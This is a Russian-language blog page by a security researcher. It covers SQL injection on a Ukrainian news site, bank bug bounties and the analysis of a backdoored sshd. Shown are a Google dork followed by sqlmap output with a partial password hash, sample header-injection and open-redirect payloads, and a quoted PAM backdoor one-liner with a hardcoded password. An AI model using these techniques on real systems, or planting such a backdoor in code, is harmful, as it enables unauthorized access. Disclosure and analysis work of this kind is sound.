herm1t LIVE!ng room [entries|archive|friends|userinfo]
herm1t

[ website | twilight corner in the herm1t's cave ]
[ userinfo | ljr userinfo ]
[ archive | journal archive ]

говнохак говносайтов [Aug. 5th, 2014|01:30 pm]
[Tags|, , , , , , , , ]
[Current Mood | bored]

блядь, сбербанк... )
помимо КДПВ, кое-что нашел... ;-)

Кстати, по поводу РБК (27 мая). В начале копался руками, потом сообразил, что ломали дебилы и нужно быть проще. STFG inurl:"id=" site:rbc.ua дал ссылку на file.php, ну и все:

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:

Type: boolean-based blind
Type: error-based
Type: UNION query
...
available databases [28]

(mysql.users) ...localhost,p...,*F22A9DA37E2D88F7176E5B0A4F5C72...,,N,N,N,N,N,,N,N,0,N,N,N,,N,N,N,N,,N,N,0,N,N,0,N,N,N,N,N,N,N,0,N...

Фигни всякой понаходилось: , h1>Hacked AZERBAIJAN Defacers, h1>Hacked AZERBAIJAN Defacers, h1>Hacked AZERBAIJAN Defacers, h1>Hacked AZERBAIJAN Defacers (2009-11-05)

Крысы ходили по серверам, как у себя дома. И на закуску (URI я затер, тут не сервис-центр, бага до сих пор там):
РБК Украина XSS )

Стыдно, господа безопасники и хакеры. И адски скучно.

UPD. Написал в Ощад, Дмытру из РБК я уже давно отписался, но что-то мне подсказывает, что это дело дохлое. Если бы не юзера этой фигни, вылил бы все в паблик. Чтобы не мучаться /me ушел баловаться в зону RU.

Link3 comments|Leave a comment

Unix security [Nov. 9th, 2013|06:28 pm]
[Tags|, , , , , , , ]

Заинтересовался собственно вопросом, а как бы оторвать LD_PRELOAD и ptrace каким-нибудь штатным образом. Нашел только ответ Кокса, о том, что неотрываемость оных - is the normal Unix model. Normal, блядь, model. За 15+ лет работы с юниксами, мне один раз понадобился LD_PRELOAD для более или менее "нормальной" задачи, а вот не очень нормальных я знаю вагон. =)
Link15 comments|Leave a comment

Bounty hunt по-украински [Jul. 2nd, 2013|11:45 am]
[Tags|, , , ]

О ПриватБанке в последний раз. Итого, заслал 26 февраля пять уязвимостей. header injection (?xxx=%0afoobar), protocol related URL redirect (?xxx=//google.com), эпическая фигня в П24 за которую мне заплатили И не пофиксили (даже после того, как я нарисовал сценарий атаки), и два XSS на siteheart.com. Всего 5k гривен - НДФЛ 15% = $520. За два-три часа работы со сканером +- справедливо. И. Байки раз в месяц о том, что вот-вот, или не подписали какой-то приказ, или сфейлил неведомый "исполнитель". :-D Последний платеж пришел вчера (1 июля). Вообщем, заниматься этим можно от скуки, или если ты бедный студент. Выплаты идут на карту ПБ. Никакого NDA и/или договора нет. Впечатляет.
Link10 comments|Leave a comment

Какой пиздец [Jun. 7th, 2013|10:17 am]
[Tags|, , , ]

<?php

/**
 * DB parameters
 */
if( 'ksset.mydinamit.com' == substr($_SERVER[HTTP_HOST], -19) )
{
    define( 'raKSCFG__DB_USERNAME',                 '*****' );
    define( 'raKSCFG__DB_PASSWORD',                 '*****' );
}
else
{
    putenv( 'ORACLE_HOME=/usr/local/oracle/instantclient_11_1' );
    putenv( 'NLS_LANG=AMERICAN_AMERICA.CL8MSWIN1251' );
    putenv( 'TNS_ADMIN=/usr/local/oracle/instantclient_11_1' );
.....
Link2 comments|Leave a comment

sshd backdoor [Jun. 2nd, 2013|11:03 am]
[Tags|, , , , , , , ]

Переживаю из-за того, что под юниксами так и не появилась культура работы с бинарями, лошадки в мире open-source поставляются в исходниках (и зачастую открытых*, я уже писал про Темную Пиявку aka DarkLeech), на этот раз мне подкинули пару бинарей sshd на посмотреть. Один из них оказался резервной копией оригинала. Второй пропатченный. Спалили его по rpm -V.

Я тоже не люблю спросонья в бинарях копаться. Взял strings.

      pax vobiscum
      /tmp/mc.tmp
      Sshd password detected: %s:%s

На колупание бэкдора ушло 10 минут. До дизассемблера не дошло. А я-то думал отложить на утро, и предвидел чудеса кодерской мысли и тайны ондеграунда. :-) С pam_unix.so - та же беда, вот уже несколько лет школоло таскает один и тот же one liner ("if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}"), zero-day, блять, сцыкьюрити, оборачивая его не менее "илитными" скриптами на sh. Мир вам, тупые дети! Неужели, так трудно написать нормальную лошадку, так чтобы не тащить в систему 100500 девелоперского стаффа и прочего говна? Тем более, что все уже давно написано. Подсказки давать не буду, кому нужно - сам найдет.

(* у этого подхода есть и достоинства - антивирус бесполезен, чуть менее, чем полностью. Впрочем, антивирус бесполезен в любом случае. Недостатков вагон.)

Link1 comment|Leave a comment

Ваша точка опоры... [Apr. 17th, 2013|04:46 pm]
[Tags|, , , , , ]
[Current Mood |busy]

Некоторое время назад подергал за усы Приват. Нашлись XSS, редиректы, header split и еще кое-что. 2/5 дырок уже пофикшены, и даже bounty перечислили. А самой злобной дырой вышло занятно: «...@privatbank.ua>: Сигнал не был подтвержден предварительной проверкой и был направлен на детальную проверку» Пришлось нарисовать небольшое демо, для наглядности тык-скыть. Возымело. «Согласен с вами - направлю еще раз с грифом экстренности.» Посмотрим, что из этого выйдет. :-)
UPD экстренно = семь дней. назначили баунти - не очень много, но на пиво хватит. :-)

Link11 comments|Leave a comment

Как я заработал $740 за 10 минут [Aug. 30th, 2012|10:31 am]
[Tags|, , , ]
[Current Mood |awake]

«Здравствуйте, уважаемый Клиент банка! 03.07.2012 был получен Ваш сигнал о возможности просмотра данных клиентов банка ... В ходе анализа нашими специалистами, уязвимости были подтверждены и в августе 2012г. устранены ... Ваш сигнал был оценен экспертным путем, в результате чего Вам присуждается денежное вознаграждение в размере 6 000 грн. ... Спасибо за полезную информацию! Ждем от Вас новых сигналов об уязвимостях! » upd. да, заплатили, как обещали.
Link12 comments|Leave a comment

navigation
[ viewing | most recent entries ]